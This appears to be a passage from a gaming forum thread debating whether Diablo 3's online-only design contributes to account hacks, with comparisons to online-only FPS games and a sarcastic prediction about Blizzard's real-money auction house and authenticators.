However, this is just one game of many. If it wasn't D3 right now it would just be another online game somewhere else. I have no doubt that there are people playing D3 right now, that would have been playing offline, who were also affected by the hack.
I sympathize with those people, I really do.
However, I don't think you make a design decision like online only based on security, and that is coming from a very security minded individual. They have to make the games they want the way they want to. If the market will support their game (which it obviously is in this case) then they have nothing to be sorry about in that sense.
If Diablo 3 were an MMO (a terrible one I'm sure) we would have the same thing going on, but no one would be questioning if it should have offline play or not.
FPS games have evolved over the years. We now have FPS games that are strictly online. Global Agenda, Tribes Ascend, Blacklight Retribution to name a few off the top of my head. I'm sure there are better examples, but not all FPS games have an offline mode even though they used to, just like not all Hack & Slash games have the online only requirement.
Those FPS games were designed with a specific purpose in mind. Online only play, and that's fine. If you don't like that type of thing then you don't have to buy it, which you obviously know.
The fact is that making this one game have an offline only mode doesn't solve the problem. It doesn't even solve the problem for this one specific game as many people would still choose to play online. D3 would still face the same issue it is currently facing.
Confused.
Anyways, sorry about that, my mistake.
No, they are NOT trying. That is my point. Making the game offline only would prevent hacks, not the other way.
They know what they are doing though. After a few thousand people get their real life bank accounts robbed through the RMT AH/paypal un-dynamic duo, there will be a massive outcry, which Blizzard will answer by announcing a new "super-authenticator" which will probably log you into the game automatically, and will definitely cost way more than it should.